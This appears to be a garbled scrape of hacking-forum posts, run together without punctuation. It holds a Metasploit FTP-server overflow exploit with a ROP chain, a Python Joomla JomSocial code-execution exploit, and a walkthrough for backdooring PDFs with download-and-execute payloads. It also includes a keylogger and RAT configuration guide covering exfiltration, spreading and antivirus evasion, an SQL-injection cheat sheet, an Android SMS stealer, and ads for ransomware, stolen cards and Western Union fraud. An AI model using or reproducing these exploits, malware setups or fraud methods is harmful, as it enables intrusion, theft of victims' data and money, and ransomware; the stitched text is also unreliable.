how watch youtube videos for only without having account. 
for example i'll using this one hidden content you must reply see links now this hidden content you must reply see links moral the story and how use the very end the video link youtube just add code and you'll able watch. 
great post man thank you. 
reboot serbia wrote thank you man good kaskd thks bro. 
cracked avg keys free avg keys working seriously hit that button that's motivating factor download avg hidden content you must reply see links don't think necessary for virus scan but for who skeptical here hidden content you must reply see links ejlidibi xepnt hodbfygjeqaqmg. 
unbelievable that company such facebook does not take the maximum measure insure the security their users. 
com require'msf core' msf exploit remote rank greatranking includemsf exploit remote ftp include msf exploit remote egghunter definitialize info super update info info 'name' 'turbo ftpserver. 
portoverflow' 'description' thismodule server. 
'author' 'zhaoliang' 'lincoln' metasploit 'corelanc metasploit metasploit 'license' msf license 'platform' 'win' 'references' 'osvdb' 'payload' 'badchars' 'encodertype' msf encoder type alphanummixed 'edi' 'targets' 'automatic' 'windows. 
'ret' retn ropnop tbssvc. 
exe 'ver' 'oct end defcheck connect disconnect banner. 
return exploit checkcode vulnerable elsif banner. 
return exploit checkcode vulnerable end return exploit checkcode safe end defcreate rop chain ver mona. 
ifver rop gadgets popecx retn tbssvc. 
exe ptrto virtualalloc iattbssvc. 
exe mov edx dwordptrds ecx subeax edx retn tbssvc. 
exe xchg edx edi retn tbssvc. 
exe xchg esi edi retn tbssvc. 
exe popebp retn tbssvc. 
exe cad jmp esp tbssvc. 
exe popebx retn tbssvc. 
exe ebx popedx retn tbssvc. 
exe edx popecx retn tbssvc. 
exe ecx popedi retn tbssvc. 
exe retn ropnop tbssvc. 
exe popeax retn tbssvc. 
exe nop pushad retn tbssvc. 
pack elsifver rop gadgets eae popecx retn tbssvc. 
exe xor eax eax tbssvc. 
exe badda add eax edx retn tbssvc. 
exe xchg eax esi xoreax eax popebx retn tbssvc. 
exe ebx popebp retn tbssvc. 
exe call esp tbssvc. 
exe popedx retn tbssvc. 
exe edx adc popecx retn tbssvc. 
exe ecx fbe popedi retn tbssvc. 
pack end returnrop gadgets end defexploit target target ifmy target. 
name 'automatic' print status connect disconnect banner. 
target targets elsif banner. 
target targets end notmy target print status matchingtarget. 
quiting return end target target end print status selectedtarget target. 
name connect login rop chain create rop chain target 'ver' rop rop chain. 
join eggoptions checksum true eggtag depmethod 'virtualalloc' depreg 'esi' badchars hunter egg generate egghunter payload. 
encoded badchars eggoptions speedupasm movedx eax speedupasm sub edx speedupasm subesp speedup metasm shellcode. 
encode string fasterhunter speedup fasterhunter. 
name server buf rand text alpha buf. 
join buf buf target 'ret'. 
join eip buf buf. 
join send cmd 'cwd' buf true send cmd 'port' buf true print status egghunter deployed handler disconnect end end. 
let check dis out. 
hello every one can any body tell how can fund the password the attached pics please thanks very much attach config attach. 
hope good stuff are there check hope good stuff are there check. 
hakgod wrote hidden content you must reply see linksdumps carding tutorial beginning before you out there and start instoring you will need the following items. 
one wants join the project. 
wrote table width hello friends pls twll how this trick still working dont beleieve look the below trick posted. 
this simple guide read somebody else facebook messages without any effort cheers mike pls tell how works. 
this simple guide read somebody else facebook messages without any effort cheers ill check this out now mike wrote table width hello friends this trick still working dont beleieve look the below trick posted. 
this simple guide read somebody else facebook messages without any effort cheers ill check this out now mike. 
white wrote paypal scam with this scam you can get victim logins victim personal information victim credit card victim bank details screentshot change your email this files login. 
that's good post sounds like it'll work cheers. 
can wait long finds out for. 
we're now online for asking questions related the product. 
injector botnet function http grabber firefox chrome download execute udp flood ddos chat massagebox download. 
hey all wondering this hack works thanks. 
tut how backdoor pdf's get lots slaves source hackforum this guide will tell you how backdoor pdf. 
what this basically does that will download your server when someone opens your pdf file not responsible for what you use this guide for and nor this meant rat other members. 
tut requirements metasploit pdf ebook and fud server. 
metasploit can downloaded here search the web for free ebooks make your pdf file ready upload your fud server hosting service which provides direct download links would use dropbox. 
and make sure that you have installed metasploit correctly now will infect the pdf file. 
type this the console use exploit windows fileformat adobe pdf embedded exe. 
type this the console set payload windows download exec. 
type this console set infilename example set infilename users owner desktop example. 
type this console set url example set url. 
type this console exploit now you have infected your pdf file and you will ready send out when people open the infected pdf file then will download your server and bam new slave. 
the infected pdf file will the same directory the original and will named evil. 
pdf this helped you then any kind feedback welcome. 
keyloggers the complete tutorial there are many ways you can hack computer rats keyloggers bots and password stealers. 
this tutorial will teach you how set your own keylogger and also protect yourself against them. 
what keylogger keylogger program that records persons keystrokes everything they type and send the logs back the the hacker either email ftp. 
good keyloggers also detail what program the keystrokes were typed into. 
settings for this tutorial will using images from unknown logger. 
believe that very thorough logger but there are many free keyloggers which will link another section. 
note will going from the top left going down there are two ways that you can receive your keylogs email ftp. 
email with email recommend you create two new email addresses one for sending and one for receiving and not use your personal email. 
gmail usually what people use can hold lots logs and secure you have the settings right. 
email address you put your email address into that obviously. 
password you put the password your keylogger email. 
recommend your new email address has different email than your personal email address because you have your recovery email they can see the address and login with the same pass. 
smtp server where you get your email. 
for gmail would smtp. 
com and for hotmail would smtp. 
you can search for these you are not sure. 
logs sent you put where the logs will sent. 
you could set this the same email address you used the first field but this would less secure and you would much safer having them sent different email with different pass. 
port this the smtp port. 
for gmail this port. 
you should look what port your email provider uses. 
ftp for ftp you need ftp server. 
there are many sites that offer ftp like. 
com free website hosting ftp username your ftp username you will given this password you will given this asked make one depending host url this the ftp address where will save logs. 
you will given the address your host. 
would advise you test these. 
lots keyloggers offer you button test. 
icon icons add your servers credibility. 
location you put the address the icon you want use here. 
you are going crypting binding there's need. 
file pumper file pumpers increase the size the server file. 
this used make more believable. 
add here you put how many you want increase your file. 
here you select what format the number you had the add box was. 
stand for kilobytes and would used for very small amounts. 
stands for megabyte and would best you are say binding with song. 
stands for gigabytes and would used for huge files like adobe suite would more. 
send logs time interval this important. 
this how often you want the logger send keylogs. 
don't set too small because you would just get lots very short logs and don't set too high say hours your victim mightn't use the for that long and would never get sent. 
best setting would mins. 
server just the name that will put the file outputs. 
the checkbox self explanatory. 
antis these disable make your server undetectable antiviruses and sandboxes and other forms security. 
varies from program program what way the antis work. 
would advise enabling these they allow your keylogger the computer for longer. 
spreaders these are methods infecting more computers using your victims computer. 
they operate infecting files sent programs limewire shareaza emule bearshare etc. 
infecting usb drives usb sending files over lan lan infecting specific filetypes rar zip sending files chat and messaging applications outlook omegle msn yahoo skype icq and other methods. 
spreaders are always handy for getting more victims with little effort uses your victims computer power rather than your time and energy. 
stealers stealers take logins and keys for various programs. 
they make the process taking usernames and passwords lot quicker you won't need search through endless logs. 
fake message possibly the silliest feature yet for some reason every rat and keylogger has one and one would advise you not use. 
basically what does bring fake error message your victims. 
you use this will quite obvious the user that their infected and they will remove your keylogger. 
webcam logger this will take pictures video with the webcam the victims they have one. 
set the interval the same the logs interval before you want use. 
screen logger this will take screenshots the victims screen every period time. 
set the same logs too you want use. 
set too low you will have too much data. 
clipboard logger this saves text that the victim copies the clipboard. 
basically every thing copy saved. 
download and execute very important that you have this every keylogger rat that you use. 
allows you install another keylogger rat your victims. 
this mean that you can change different rat keylogger later give some victims friend what not. 
add link places where you can put file download and execute you ever need. 
exe you can make shortened link bit. 
and direct your server when you need. 
webpage loader visitor this opens webpages and ads. 
its obvious and would alert your victim that they are infected. 
you would use affiliate links and other methods get money from this feature. 
run startup will start the keylogger start. 
melt this deletes the server file once has infected the. 
mutex click several times. 
this helps make more undetectable. 
text speech this will play message using windows text speech feature when server installed. 
similar fake message alerts the victim that they are infected and has benefit advise you not use assembly changer this changes the assembly information your file. 
you the properties any file your computer and properties assembly you will see information about the file. 
that's what the assembly changer changes. 
cookie deleters these are brilliant your victim has saved their passwords for different sites they wont need type them and your keylogger wont get them what this does delete their cookies that they have login again. 
website blocker this blocks websites. 
the options given this picture block virus scanning websites but you can add other sites too. 
disablers these disable different windows features the victims computer that harder for them remove your virus. 
your victim savvy they will notice this straight away and remove the keylogger very quickly. 
wouldn't use these except maybe disable system restore disable registry tools and disable registry these are not used often and wouldn't noticed. 
what next worming worms make your victim spread your virus his contacts and whatever the plug their usb stick into etc. 
our example above had worm options spreaders but not every keylogger rat etc have worm spreading options. 
crypting crypting important you want get lots victims and keep them for long time. 
makes your server undetectable anti viruses. 
fud stands for fully undetectable and stands for detectable. 
fud crypters are the best especially private ones. 
binding binding when you bind your server with another file program. 
very useful for spreading. 
you would bind your server with chessgame. 
exe for example and say hey check this cool game out and when they open the game will open but will the rat. 
the victim would none the wiser whether they were infected not whereas they would suspicious nothing opened. 
spreading these are methods getting victims for your keylogger. 
you should get few and use them effectively possible. 
how protect myself against keyloggers having anti virus would start obviously careful with what you download too. 
there tool that think works very well against keyloggers. 
whenever you type something randomizes that keylogger has infected your they would just get logs jumbled numbers letters and symbols. 
you can get keyscrambler here. 
com yuwes the official site. 
htm and the user and key code alanmonick gmail. 
com mlwwltfj that dosen't work you can just use the free version try find another key you don't want use keyscrambler there also zemana anti keylogger how reverse engineer keylogger this favorite part. 
you know your infected file infected you can get the email login ftp login from the server. 
people also whaling and download obvious viruses from youtube steal lots keylogs and slaves from skids. 
there are two ways this and will explain both below. 
download and install wireshark you not already have. 
while installing make sure winpcap gets installed with. 
you have infected file and are not yet infected then open sandboxie virtualbox vmware and follow these steps within the virtual machines. 
you are already infected you can skip the next step. 
once installed open and click capture the top menu and select the interface you are following virtual machine select that otherwise select windows your network card. 
leave like that for about half hour. 
this make sure the keylogger actually does connect back while you are capturing packets. 
refer back time intervals. 
when done you need filter through the results for the ftp email login. 
type ftp the filter box and search. 
login comes for that then they have used ftp server take your keylogs. 
not try smtp search for email login. 
this dosen't work then either the keylogger hasn't connected back you did something wrong you are not infected. 
now that you have their login details you can take all their keylogs and delete their keylogs you. 
then just change the password they longer have access bintext. 
open bintext and drag the infected file into the bintext window. 
now search through for hotmail gmail yahoo ftp etc. 
and guarantee one thing you will really happy business with prestige quality and safety business contact for serious business yahoo billybender icq mail upupnow gmail. 
com sell cvv good and fresh all country i'm looking for good customer buy cvv everyday and long term will discount bonus you order bulk format cvv fullz info type card card number exp. 
minimum orders you pay with details for orders icq. 
payment method perfect money western union moneygram bitcoin contact for serious business yahoo billybender icq mail upupnow gmail. 
com hope will hear form very soon. 
this post going share new critical issue that have identified instagram mobile app. 
hidden content you must reply see links hidden content you must reply see links was shocked after seeing the results unbelievable that facebook the company that responsible for instagram did not insure that the data secured and goes through. 
hidden content you must reply see links have reported this issue facebook and they emailed saying hidden content you must reply see links the security member said facebook accepts the risk parts instagram communicating over http not over. 
what have leaked microsoft. 
codefire wrote hello friends long time after came here and thinking write something useful for you guys. 
today will learn exploit server using file upload vulnerability through our favorite framework metasploit. 
usual start with basic short intro about file upload vulnerability and then will move for our exciting practical work. 
introduction file upload vulnerability. 
hello everyone look for serous hacker leak from website. 
this work must made successfully with great quality. 
full get leaked i'll pay with escrow upon link verified. 
thanks website get leaked. 
see one can hack that. 
idm internet download manager this universal cracker for all idm version. 
download zip folder and open readme file. 
thanks advance wrote yea you heard correct its leaked not believe take look the link enjoy mike. 
usr bin python joomla jomsocial component. 
php code execution exploit authors matias fontanini gaston traberg this exploit allows the execution php code without any prior authentication the joomla jomsocial component. 
note that order able execute php code both the eval and assert functions must enabled. 
also possible execute arbitrary php functions without using them. 
therefore possible execute shell commands using system passthru etc long they are enabled. 
examples execute php code. 
php echo 'hello world. 
php tmp script execute. 
php execute shell commands using system. 
php netstat exploit shell commands using user provided function passthru this case. 
php netstat natp passthru exploit execution example python exploit. 
php 'var dump hello world retrieving cookies and anti csrf token. 
done executing php code. 
string hello world import urllib urllib argparse sys class exploit token request data 'option com community view frontpage' exploit request data 'option community html task azrul ajax func photos arg event arg arg json data call cstringhelper escape def init self url user agent none use eval true self. 
set user agent user agent self. 
use eval use eval self. 
compile 'method post enctype multipart form data. 
dotall def set user agent self user agent self. 
user agent user agent def make opener self add cookie true opener urllib. 
build opener add cookie opener. 
append 'user agent' self. 
user agent return opener def retrieve token self opener self. 
make opener false sys. 
write retrieving cookies and anti csrf token. 
token request data data req. 
findall data len token print 'failed' raise exception could not retrieve anti csrf token print 'done' return req. 
headers 'set cookie' token def call function self function parameter parameter parameter. 
replace json data exploit. 
format function parameter json data urllib. 
json data data exploit. 
token json data opener self. 
make opener req opener. 
url data function 'assert' return req. 
read elif function 'system' 'passthru' result self. 
read len result return result else return error executing command. 
read len result return result. 
replace else return error executing command. 
def call function self function parameter self. 
use eval return self. 
format function parameter else return self. 
call function function parameter def disabled functions self return self. 
call function ini get disable functions def test injection self result self. 
'world' 'hello world' result print code injection using eval works else print code injection doesn't work. 
try executing shell commands. 
def eval self code code code code return self. 
call function 'assert' exit eval base decode. 
code execution exploit parser. 
add argument url' help 'the base url' required true parser. 
add argument php code' help 'the php code execute. 
use read from stdin provide file path read from' parser. 
add argument shell command' help 'the shell command execute' parser. 
add argument shell function' help 'the php function use when executing shell commands' default system parser. 
add argument test' action 'store true' help 'test the php code injection using eval' default false parser. 
add argument eval' action 'store false' help 'don use eval when executing shell commands' default true args parser. 
parse args not args. 
test and not args. 
php code and not args. 
shell command print need something. 
url try not url. 
startswith and not url. 
startswith url url exploit exploit url use eval args. 
test injection elif args. 
php code code args. 
php code print enter the code executed code sys. 
isfile code try open code code. 
close except exception print error reading the file. 
exit print executing php code. 
eval code elif args. 
shell command print exploit. 
shell command except exception print error str. 
ill check out looks nice. 
great share looking your further content. 
uploading more tricks soon. 
bug software paypal transfer bank login mail wubugsoftware gmail. 
com icq yahoo wubugsoftware blog wubugsw. 
com skype wubugsoftware bug software that cracks western union databases and gives the data information for payments made any country the world. 
the new feature bug now that you are able change the receiver's name any name you choose same country and you are also able make new transfers using our hacked virtual credit and debit card which has unlimited financial capabilities. 
the cost the western union bug and with you can able make monthly you are smart. 
western union bug the most popular software hackers. 
works every normal computer and users can get benefit. 
the western union bug designed such way that average user computer can easily understand and use the bug. 
the previous versions western union bug was designed for the special programmers. 
accept btc wmz payment option. 
western union bug works dedicated. 
all customers that have bought western union bug claim their license will replace western union bug pro version. 
purpose make edit cancel western union transfers. 
setup time within hrs payment via btc wmz currently are the best hackers western union system. 
therefore also provide service our client that they can order create western union transfers. 
are the most trustable among such deals. 
usd for transfer usd. 
make sure you contact mail wubugsoftware gmail. 
com skype wubugsoftware paypal account sell paypal with pass email paypal sell paypal don't have pass email paypal sell banklogin personel sell paypal account reg month ago acc verified sell paypal account acc verified sell bank account info sell pvn month fake sell visa debit sell with balance sell with balance sell with balance sell with balance only have some balance like someone don't ask about low balance high balance about paypal paypal database hacker mail wubugsoftware gmail. 
com skype wubugsoftware tags bug software wubug transfer bug software paypal transfer bank login mail wubugsoftware gmail. 
com skype wubugsoftware tags bug software wubug transfer. 
cool bro lets check out. 
you are the best the game codedfire. 
just throwing this out there but this program should not create any extra files. 
anyone that downloaded this should run scan with avira malwarebytes creates file users test ysv ednex. 
exe creates file users test ysv zsu. 
zjb creates process users test ysv ednex. 
exe users test ysv ednex. 
exe injects code into process sandbox test defaultbox user current ysv ednex. 
you are doing good job. 
hope not too late for this goodies thanks for sharing. 
php feature unique code generat key fud silent spread via gmail very small size work all windows buy skype rayane. 
wrote how setup own botnet iht booter. 
connect with part finish logout thanks for the info man will help alot sure. 
codefire wrote suppongo che guys ottenuto configurazione ratto condizione lavoro fud. 
quindi non sto andando quella parte. 
sto solo dicendo qui modo per diffondere server ottenere alcune vittime. 
btw questo mio primo tut mai cos male hanno bisogno del vostro feed back. 
ewhore diffondere introduzione ewhore diffusione uno dei metodi diffusione semplici. 
otterr sacco vittime guadagnare qualche buona contanti aggiunge cappello nero esso. 
preparazione una volta ottenuto vostro fud del server necessario assicurarsi associa con una foto aggiungere l'icona immagine. 
qui viene parte importante. 
cambiare l'estensione del file exe. 
com rinominare tua foto tuo msn. 
questo modo server non sar cos sospettosi. 
non molte persone conoscono che cos non preoccupi per essere scoperti. 
alcuni siti web cui possibile diffondere server. 
non buono per sacco bot possibile ottenere alcuni pedos ricchi otterr sacco. 
buona ancora alto rischio ottenere vietato amministratore sacco vittime qui. 
non davvero buona provare. 
ewhoring diffusione buona comporta sacco lavoro. 
non stessa cosa torrente modo basta fare qualcosa diverso ottenere vittime. 
l'ho fatto poche volte creda che portato sacco bot questo metodo diffusione. 
portare sacco soldi include ewhoring con esso questo metodo richiede tempo persistenza 'quello vorrei suggerire. 
ill presto sar fare tut per alcuni altri metodi diffusione presto. 
nice one brother thanks for the post. 
maybe need pretty cool one for own hosting. 
have already released the version cryptolocker changed servers and are working already for the version and other news soon. 
for now price stable for version update. 
update the user has coded automated script for the majority this guide. 
see here hidden content you must reply see links additional irongeek's hour anti forensics course video youtube. 
dark file decrypt and allocations execution. 
wrapper and new version cryptolocker work well. 
have implement site possibility download cryptolocker update. 
today update site with. 
this month build forum support for customer and seller. 
remind our customers not recommend using the cryptolocker for test because save guid and possible recognizing the system virtual advise you testing for best test. 
tested some versions windows microsoft windows service pack microsoft windows seven black edition microsoft windows embedded standard service pack microsoft windows enterprise service pack microsoft windows ultimate service pack microsoft windows ultimate microsoft windows starter service pack microsoft windows starter microsoft windows rtm black edtion microsoft windows professional service pack microsoft windows professional microsoft windows home premium service pack microsoft windows home premium microsoft windows home basic service pack microsoft windows home basic microsoft windows enterprise service pack microsoft windows pro. 
thnaks this looks really easy cool. 
lets see what this can. 
cool very good cool very good. 
lets check this thing out. 
mysql cheat sheet version select version select version select version comment select version compile machine select version compile directories select basedir select tmpdir select datadir users select user select system user select user select current user current database select database concatenation select concat 'foo'. 
bar select concat 'hello' 'mysql' 'and' 'hello' 'world returns hello mysql and hello world multi concat stacks the row foo from the table bar together using the separator. 
note this operation can default only grab bytes and not allow limit. 
the byte limit stored the group concat max len variable. 
select group concat foo separator from bar better concat concat and concat not have the same restriction group concat. 
which therefor allows you concat strings together the max allowed packet size instead group concat max len. 
the default value for max allowed packet currently set bytes instead group concat max len's. 
select concat select concat table schema table name column name from information schema. 
columns limit select concat table schema table name column name from information schema. 
columns limit change collation select convert 'test' using latin converts test latin from any other collation. 
select convert 'rawr' using utf converts rawr utf. 
wildcards select select foo from bar where like 'test returns all column starting with test. 
select foo from bar where like test' returns all column ending with test. 
regular expression select returns all columns matching the regular expression. 
select foo from bar where rlike moo rawr. 
select without dublicates select distinct foo from bar counting columns select count foo from bar returns the amount rows foo from the table bar. 
get amount mysql users select count user from mysql. 
user get mysql users select user from mysql. 
user get mysql user privileges select grantee privilege type grantable from information schema. 
user privileges get mysql user privileges different databases select grantee table schema privilege type from information schema. 
schema privileges get mysql user privileges different columns select table schema table name column name privilege type from information schema. 
column privileges get mysql user credentials privileges select concat host user password select priv inse priv update priv delete priv create priv drop priv reload priv shutdown priv ocess priv file priv grant priv references priv index priv ter priv show priv super priv create tmp table priv lock tables priv execute priv repl slave priv repl client priv from mysql. 
user get mysql dba accounts select grantee privilege type grantable from information schema. 
user privileges where privilege type 'super' select host user from mysql. 
user where super priv 'y' get databases select schema name from information schema. 
schemata select distinct from mysql. 
select distinct table schema from information schema. 
columns select distinct table schema from information schema. 
tables get databases tables select table schema table name from information schema. 
tables select distinct table schema table name from information schema. 
columns get databases tables columns select table schema table name column name from information schema. 
columns select certain row select foo from bar limit returns row. 
select foo from bar limit returns row. 
benchmark heavy query performs calculation for times. 
select benchmark sleep works only mysql and above. 
sleeps for seconds returns success. 
select sleep conversion casting select cast unsigned integer returns select cast char returns substring select substr 'foobar' returns foo hexadecimal evasion select returns abcd select returns. 
select returns ascii number select ascii 'a' returns number ascii select char returns select char returns select char returns test statement returns the database running mysql. 
select ascii substr version returns the database running mysql. 
select ascii substr version case statement returns the database running mysql. 
select case when ascii substr version then else end returns the database running mysql. 
select case when ascii substr version then else end read file requires you have the file priv mysql. 
error this statement will return null. 
select load file etc passwd' write file you must use quotes the filename select 'hello world' into dumpfile tmp test. 
txt' select select null into dumpfile tmp test. 
txt' null null 'hello world' logical operator and the and operator have alternative syntax. 
the operator have alternative syntax. 
not the not operator have alternative syntax. 
xor the xor operator got alternative syntax. 
code comment code within are getting executed mysql. 
additional can used instead space evasion. 
select concat user host password from mysql. 
user comments select foo bar from foo. 
bar single line comment select foo bar from foo. 
bar multi line comment select foo bar from foo. 
bar batched query with additional null byte. 
not work together with php though. 
few evasions methods use between your mysql statements carrier return. 
tab the tab key. 
space most commonly used. 
you know what space. 
multiline comment well the name says. 
comment sure end your query with parenthesis and can also used separators when used right. 
parenthesis instead space said two lines above the use parenthesis can used separator. 
bar where union select auto casting right collation select unhex hex user unhex converts the hexadecimal value the current collation. 
dns requests oob out band for more information check this. 
select yourquery into outfile hidden content you must reply see links command execution you're mysql. 
server it's possible execute commands long you're dba. 
can done you're able upload shared object into usr lib. 
and must contain user defined function udf. 
it's the source code for just that feature. 
remember compile for the right cpu architecture. 
the cpu architecture can resolved this query select version machine couple useful blind queries fingerprint the database. 
all these return either true false you either get result you don't. 
version select from foo. 
bar where and ascii substr version mysql select from foo. 
bar where and ascii substr version mysql running root select from foo. 
bar where and select substr user unhex hex got file priv select from foo. 
bar where and select file priv from mysql. 
user where concat char user host like user concat user unhex hex like user concat char user host like concat substr user instr user char cha limit char got super priv are dba select from foo. 
bar where and select super priv from mysql. 
user where concat char user host like user concat user unhex hex like user concat char user host like concat substr user instr user char cha limit char can mysql sleep this query will return true and should take above second execute. 
bar where and select sleep can mysql benchmark select from foo. 
bar where and benchmark are nix select from foo. 
bar where and ascii substr datadir are windows select from foo. 
bar where and ascii substr datadir certain column exist select from foo. 
bar where and select count column name from information schema. 
columns where column name like 'your column' limit certain table exist select from foo. 
bar where and select count table name from information schema. 
columns where table name like 'your table' limit select from foo. 
tables where table name like 'your table' limit certain database exist select from foo. 
bar where and select count table schema from information schema. 
columns where table schema like 'your database' limit select from foo. 
tables where table schema like 'your database' limit select from foo. 
bar where and select count schema name from information schema. 
schemata where schema name like 'your database' limit select from foo. 
bar where and select count from mysql. 
where like 'your database' limit. 
codefire wrote thethanks bro but first not android stealer ever created raziel presents razstealer. 
beta features stealthy shit launcher icon not sight not mind the victim will never suspect anything the only place where its listed the application list where pretty much all apps are listed launched when you trigger via sms. 
you send sms the victim and the sms starts with the secret code which you defined will start doing its shit background ofc steals shit currently steals the following still adding stuff and always open for suggestions actually wantz suggestions sms incoming and outcoming contacts pictures scans through the card recursively and their size doesnt exceed the upload limit less you decide they will included the package victims personal info currently only phone model phone number operator zips shit after stealing shit zips everything into sexy zip file and uploads there's internet sits and waits and sends your own freaking email deletes shit after everythings done deletes all temp files created root plan add this later but currently none the features require root access wont ask for them and will work flawless not rooted android phone apk minimum requirements android phone with these specs mhz armv cpu ram gingerbread. 
newer phone rom free card space has less than the pics will excluded and then requires shit steal though will probably run any android running gingerbread. 
and having lower specs than these will cause heavy slowdowns while operating. 
what you need working gmail from which the app will use send the data you has gmail since didnt want lose much time implementing multiple smtp servers because the app can reverse engineered dont recommend putting your private mail but instead make fun gmail for this occassion. 
android developer tools since couldnt find way make portable compiler you will have compile the project java jre for adt setting. 
import and compile using adt. 
send the apk the victim. 
send the sms with the trigger code. 
wait for mail with the package. 
read step again what can this shit used for just some ideas had while creating the app hack facebook via the sms password reset sign sites via the sms confirmation collect whoring material pictures from the girl next door with big titties complete surveys wich require sms confirmation using someone else's phone number downloads. 
update hide reply hide reply whats new you can now enable the feature auto start the stealer when the phone boots you can now enable the feature delete the zip file after uploading sms thread fixed and optimized sms stealer now includes date and fixed your trying dump tutorial wanna give you. 
best turorial come back with best turorial. 
this program basically will crack routers with known well attempt crack them with known passwords usernames. 
you can add more usernames and passwords you wish altering the user and pass text files. 
say thanks you find the tool useful all credits the original coder stas'm don't douche say thank you below you find the program useful router scan able find and identify variety devices from large number known routers routers and most importantly pull out from them useful information particular the the wireless network way protect access points encryption access point name ssid and key passphrase. 
also receives information about the wan connection useful when scanning local network and outputs the make and model router. 
getting information occurs two possible ways the program will attempt pick couple login password the router from the list standard passwords resulting gain access. 
either will used non invasive vulnerability bugs for specific router models obtain the necessary information and bypass the authorization process. 
added model routers complete list see the documentation. 
updated parsers complete list see the documentation. 
added the ability customize the table successful outcome selection successful authentication wired wireless devices well additional information. 
added generation modes off automatic always enabled automatic checks and delays can disable the generation intensive use resources. 
fixed line break bug when copying device information. 
editor ranges now able pull out the address the url. 
improved loading settings the absence configuration files they will created with the default settings. 
slightly improved recycling streams timeout forced stop. 
added the ability exclude certain addresses from the scan ports. 
now you can select once all records the selected table pressing ctrl. 
added support for loading the access points found the database wifi. 
fixed utf encoding when exporting reports. 
hnap module will now pass inspection before the main unit has successfully received all the information for the forced checking vulnerability hnap turn off the main unit. 
fixed bug hovering with frequent pressing the scan pause. 
number active threads the status bar now displayed two numbers active scanner flows ports and handler. 
http headers such referer now sent automatically. 
fixed bug import the last column csv. 
added function debug the recording tcp packets. 
added exploit link dap bypass authentication and obtain the administrator password. 
reports txt and csv formats now support only utf encoding export import. 
the position and size the window now saved the settings. 
fixed bug change interval automatically save the results the settings. 
added exploit micro dsl sagemcom retrieve the administrator password. 
fixed bug with the csv import double quotes the end the field. 
added exploit asus boa adsl utility account. 
tabs now filtered you type ranges. 
wps pin companion now able import the bssid list jumpstart wireless program also known link qss. 
fixed bug check scan exclusion. 
improved use and recycle streams scanning the program now uses less system resources. 
changed the set provided api librouter using the library your applications read the update the user manual. 
port added the list ports. 
added exploit get the name and the administrator password devices realtek ecos webs. 
added exploit get the name and the administrator password the firmware link comm. 
fixed automated installation page definition the primary redirection. 
added the ability import reports adding them the existing data the table. 
added the ability set comment for several lines once. 
added ability delete rows the main table and search results. 
when you stop the flow all open connections are automatically terminate them. 
watchdog switched from logging the address during scan which connection problems have been found. 
you can now double click the error row highlight the problematic ranges editor. 
added exploit obtain some data netgear access points without authorization. 
added exploit get the name and password some access points link without authorization. 
fixed bug the http client when processing redirected. 
added the license agreement and improved documentation the program download. 
thanks for posting file will try. 
thanks for this sharing man. 
sell dumps with pins fresh china usa taiwan aus brazil euro new dumps bases valid. 
sales dumps track track track pin. 
fast automatic payment methods. 
checking balance cards over. 
replace lost stolen hold card error call. 
refunds hours after purchase. 
discount system for favourite clients very loyal. 
icq support gmail mixdumps gmail. 
can propose you the best client service you have ever seen because our selling and support team real market leader. 
have discount and special offers for serious buyers. 
don't sell tracks pins propose you only original dumps which are hacked only not skimmed stuff. 
sell bulk usa mix pcs with valid rate will have dumps for poor costumers but valid rate low refund time minutes shop dumps. 
payment trough bitcoin perfect money vouchers ukash paysafe ltc dark coin and western union have only this icq jabber other icq have only this gmail mixdumps gmail. 
thanks look forward working with all you. 
there are many sites that offer ftp like hidden content you must reply see links just here hidden content you must reply see links username your ftp username you will given this password you will given this asked make one depending host url this the ftp address where will save logs. 
add link places where you can put file download and execute you ever need hidden content you must reply see links you can make shortened link bit. 
you can get keyscrambler here hidden content you must reply see links the official site hidden content you must reply see links and the user and key code alanmonick gmail. 
com mlwwltfj that dosen't work you can just use the free version try find another key you don't want use keyscrambler there also hidden content you must reply see links how reverse engineer keylogger this favorite part. 
download and install wireshark you not already have hidden content you must reply see links. 
download bintext here hidden content you must reply see links. 
full seriously hit that button that's motivating factor ardamax keylogger. 
ardamax keylogger keystroke recorder that captures user's activity and saves encrypted log file. 
the log file can viewed with the powerful log viewer. 
use this tool find out what happening your computer while you are away maintain backup your typed data automatically use monitor your kids. 
also you can use monitoring device for detecting unauthorised access. 
logs can automatically sent your mail address access the keylogger password protected. 
besides ardamax keylogger logs information about the internet addresses the user has visited. 
this invisible spy application designed for vista and windows. 
keylogger features keystroke logging records all typed keystrokes passwords and hidden characters. 
browsers capturing records log all websites visited for all browsers. 
webcam recording periodically makes webcam pictures and stores them log. 
email log delivery keylogger can send you recorded logs through mail delivery set times perfect for remote monitoring ftp delivery ardamax keylogger can upload recorded logs through ftp delivery. 
microphone recording record voice from the microphone with real time compression. 
network delivery sends recorded logs through via lan. 
clipboard logging capture all text copied the windows clipboard. 
invisible mode makes absolutely invisible anyone. 
ardamax keylogger not visible the task bar system tray windows vista windows task manager process viewers process explorer wintasks etc. 
start menu and windows startup list. 
visual surveillance periodically makes screenshots and stores the compressed images log. 
chat monitoring ardamax keylogger designed record and monitor both sides conversation following chats aim windows live messenger icq skype yahoo messenger google talk miranda qip security allows you protect program settings hidden mode and log file. 
application monitoring keylogger will record the application that was use that received the keystroke time date tracking allows you pinpoint the exact time window received keystroke powerful log viewer you can view and save the log html page plain text with keylogger log viewer. 
small size ardamax keylogger several times smaller than other programs with the same features. 
has additional modules and libraries its size smaller and the performance higher. 
unicode ardamax keylogger fully supports unicode characters which makes possible record keystrokes that include characters from japanese chinese arabic and many other character sets. 
other features windows vista windows windows support monitors multi user machines automatic startup friendly interface easy install note always perform virus scan and download your own risk. 
blazelord wrote hey guys today would sharing this email spoofer font color all credits crypt thanx. 
what league legends had host put would release shit anyone got good hosting can share profits. 
you can't share for free don't fucking post anything. 
still looking buy australian company emails and password. 
tanks bro for that awsome. 
gonna ggive test shot with old android. 
western union transfer hack longer news and you probably know about that why you are searching for. 
there lot tutorial and tips out there how hack western union transfer and western union bug also called bug software. 
some hackers claim they have the original western union bug software and they can worldwide western union transfers all countries. 
let examine these claims few minutes and know how real. 
western union bug software exist was going through forum and came across someone selling pdf tutorial how hack western union server and database using the pro version the software has. 
paused for while and laughed because the dude knows nothing about western union money transfer hacking. 
there software tool anywhere the world that can automatically hack crack western union database generate mtcn payment. 
all cooked story this tool software does not exist. 
every year they come with bug latest version code files activation key and serial key keygen and apocalypse bounty bullshit the real western union transfer hack the only way you can generate western union mtcn and pickup money successfully carding with credit card fullz bank login. 
with credit card fullz comprising card holder name card number cvv ssn exp date dob and mother maiden name you can make online transfers from western union website. 
most carders claim this but not that easy because western union have high security. 
our western union transfer services are group russian hackers with over years experience specialize western union carding and professional bank transfer services. 
use thousands credit card fullz and bank login. 
process series transfers our exchangers who then relay the funds you. 
the result that you receive clean funds. 
